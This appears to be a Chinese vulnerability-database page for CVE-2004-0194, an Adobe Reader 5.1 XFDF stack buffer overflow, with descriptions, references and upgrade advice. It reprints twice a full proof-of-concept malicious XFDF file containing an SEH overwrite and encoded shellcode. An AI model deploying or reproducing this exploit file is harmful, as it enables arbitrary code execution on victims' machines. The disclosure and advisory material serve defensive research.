CVE-2004-0194
CVSS7.5
发布时间 :2004-03-29 00:00:00
修订时间 :2016-10-17 22:41:44
NMCOEP    

[原文]Stack-based buffer overflow in the OutputDebugString function for Adobe Acrobat Reader 5.1 allows remote attackers to execute arbitrary code via a PDF document with XML Forms Data Format (XFDF) data.


[CNNVD]Adobe Reader 5.1 XFDF缓冲区溢出漏洞(CNNVD-200403-118)

        
        Adobe Acrobat Reader用于查看PDF文档,Reader可使XML表单数据格式或XFDF进行扩展。
        Adobe Acrobat Reader在处理XFDF文件时不安全调用sprintf,远程攻击者可以利用这个漏洞构建包含此文件类型的恶意链接,诱使用户处理,造成缓冲区溢出。
        XFDF文件包含.xfdf扩展,可使用IE浏览器自动下载并打开,另外,不管文件扩展是什么,如果MIME类型设置为"application/vnd.adobe.xfdf",文件都会作为XFDF处理。当Adobe Acrobat Reader处理xfdf文件时在使用OutputDebugString输出调试消息时不安全调用sprintf,可造成典型的基于堆栈的缓冲区溢出。进程是否被调试此漏洞代码照样被调用,因此攻击者可以构建包含恶意XFDF文件的WEB链接,或发送EMAIL诱使用户处理,可触发缓冲区溢出,精心构建XFDF数据可能以进程权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0194
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0194
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-118
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-March/018227.html
(UNKNOWN)  FULLDISC  20040303 Adobe Acrobat Reader XML Forms Data Format Buffer Overflow
http://marc.info/?l=bugtraq&m=107842545022724&w=2
(UNKNOWN)  BUGTRAQ  20040303 Abobe Reader 5.1 XFDF Buffer Overflow Vulnerability
http://www.nextgenss.com/advisories/adobexfdf.txt
(VENDOR_ADVISORY)  MISC  http://www.nextgenss.com/advisories/adobexfdf.txt
http://www.securityfocus.com/bid/9802
(VENDOR_ADVISORY)  BID  9802
http://xforce.iss.net/xforce/xfdb/15384
(VENDOR_ADVISORY)  XF  acrobatreader-xfdf-bo(15384)

- 漏洞信息

Adobe Reader 5.1 XFDF缓冲区溢出漏洞
高危 未知
2004-03-29 00:00:00 2005-05-13 00:00:00
远程  
        
        Adobe Acrobat Reader用于查看PDF文档,Reader可使XML表单数据格式或XFDF进行扩展。
        Adobe Acrobat Reader在处理XFDF文件时不安全调用sprintf,远程攻击者可以利用这个漏洞构建包含此文件类型的恶意链接,诱使用户处理,造成缓冲区溢出。
        XFDF文件包含.xfdf扩展,可使用IE浏览器自动下载并打开,另外,不管文件扩展是什么,如果MIME类型设置为"application/vnd.adobe.xfdf",文件都会作为XFDF处理。当Adobe Acrobat Reader处理xfdf文件时在使用OutputDebugString输出调试消息时不安全调用sprintf,可造成典型的基于堆栈的缓冲区溢出。进程是否被调试此漏洞代码照样被调用,因此攻击者可以构建包含恶意XFDF文件的WEB链接,或发送EMAIL诱使用户处理,可触发缓冲区溢出,精心构建XFDF数据可能以进程权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Adobe
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.adobe.com/support/downloads/main.html

- 漏洞信息 (17488)

Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH) (EDBID:17488)
windows local
2011-07-04 Verified
0 extraexploit
N/A [点击下载]
# Exploit Title: Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)
# Google Dork: N/A or filtype ".xfdf"
# Date: 04/01/2011
# Author: extraexploit@gmail.com / http://extraexploit.blogspot.com
# Software Link: http://www.oldversion.com/download/acrobat51.exe
# Version: Acrobat (formerly Adobe) Reader 5.1
# Tested on: XP SP3
# CVE : cve-2004-0194
# http://extraexploit.blogspot.com/2011/07/old-bug-for-new-job-cve-2004-0194.html

<?xml version="1.0" encoding="ISO-8859-1"?>
<xfdf xmlns="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAz AAUO<81>.AAAAAAAAAAAAAAAAAAAAAAAAAAT]ÚÞÙuô_WYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLZHK9GpC0GpQpK9IuTqN2PdNkQBTpLKCbTLLKV2EDNkCBQ8VoOGRjTfVQIoEaIPNLGLQqQlC2TlGPO1ZoVmC1XGKRL0V2QGLKRrR0LKG2GLC1ZpNkG0QhK5IPQdPJEQN0RpNkCxR8LKChQ0EQZsXcGLPINkVTNkVaIFEaIoP1O0LlIQZoTMC1KwEhIpPuIdGsCMIhEkQmQ4T5IrChNkQHVDEQICRFNkTLRkNkQHGlGqKcLKTDLKVaZpMYCtVDQ4QKCkQqCiQJRqKOM0QHQOPZNkGbZKNfQMRJEQLMLENYGpC0C0RpPhEaLKROOwKON5OKL0OEI2RvRHI6MEOMOmIoZuElTFCLEZOpIkIpQeEUOKCwGcCBPoRJGpQCIoXURCPaPlRCTnQuPxPeEPAA" xml:space="preserve">
<fields>
<field name="Date of Birth"><value>01-01-1960</value></field>
<field name="Your Name"><value>Mr. Customer</value></field>
</fields>
<ids original="FEBDB19E0CD32274C16CE13DCF244AD2" modified="5BE74DD4F607B7409DC03D600E466E12"/>
</xfdf>

Mirror: http://www.exploit-db.com/sploits/cve-2004-0194.xfdf.xfdf		

- 漏洞信息 (F102799)

Adobe Reader 5.1 XFDF Buffer Overflow (PacketStormID:F102799)
2011-07-05 00:00:00
extraexploit  
exploit,overflow
CVE-2004-0194
[点击下载]

Adobe Reader version 5.1 XFDF buffer overflow exploit.

# Exploit Title: Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)
# Google Dork: N/A or filtype ".xfdf"
# Date: 04/01/2011
# Author: extraexploit@gmail.com
# Software Link: http://www.oldversion.com/download/acrobat51.exe
# Version: Acrobat (formerly Adobe) Reader 5.1
# Tested on: XP SP3
# CVE : cve-2004-0194
# http://extraexploit.blogspot.com/2011/07/old-bug-for-new-job-cve-2004-0194.html
 
<?xml version="1.0" encoding="ISO-8859-1"?>
<xfdf xmlns="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAz AAUO<81>.AAAAAAAAAAAAAAAAAAAAAAAAAAT]ÚÞÙuô_WYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLZHK9GpC0GpQpK9IuTqN2PdNkQBTpLKCbTLLKV2EDNkCBQ8VoOGRjTfVQIoEaIPNLGLQqQlC2TlGPO1ZoVmC1XGKRL0V2QGLKRrR0LKG2GLC1ZpNkG0QhK5IPQdPJEQN0RpNkCxR8LKChQ0EQZsXcGLPINkVTNkVaIFEaIoP1O0LlIQZoTMC1KwEhIpPuIdGsCMIhEkQmQ4T5IrChNkQHVDEQICRFNkTLRkNkQHGlGqKcLKTDLKVaZpMYCtVDQ4QKCkQqCiQJRqKOM0QHQOPZNkGbZKNfQMRJEQLMLENYGpC0C0RpPhEaLKROOwKON5OKL0OEI2RvRHI6MEOMOmIoZuElTFCLEZOpIkIpQeEUOKCwGcCBPoRJGpQCIoXURCPaPlRCTnQuPxPeEPAA" xml:space="preserve">
<fields>
<field name="Date of Birth"><value>01-01-1960</value></field>
<field name="Your Name"><value>Mr. Customer</value></field>
</fields>
<ids original="FEBDB19E0CD32274C16CE13DCF244AD2" modified="5BE74DD4F607B7409DC03D600E466E12"/>
</xfdf>
    

- 漏洞信息

4135
Adobe Acrobat Reader XFDF Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

A local overflow exists in Acrobat Reader. The issue can be triggered by a specially crafted XFDF file, which causes a stack overflow when read. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-03-04 2004-02-07
Unknow Unknow

- 解决方案

Upgrade to version 6.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站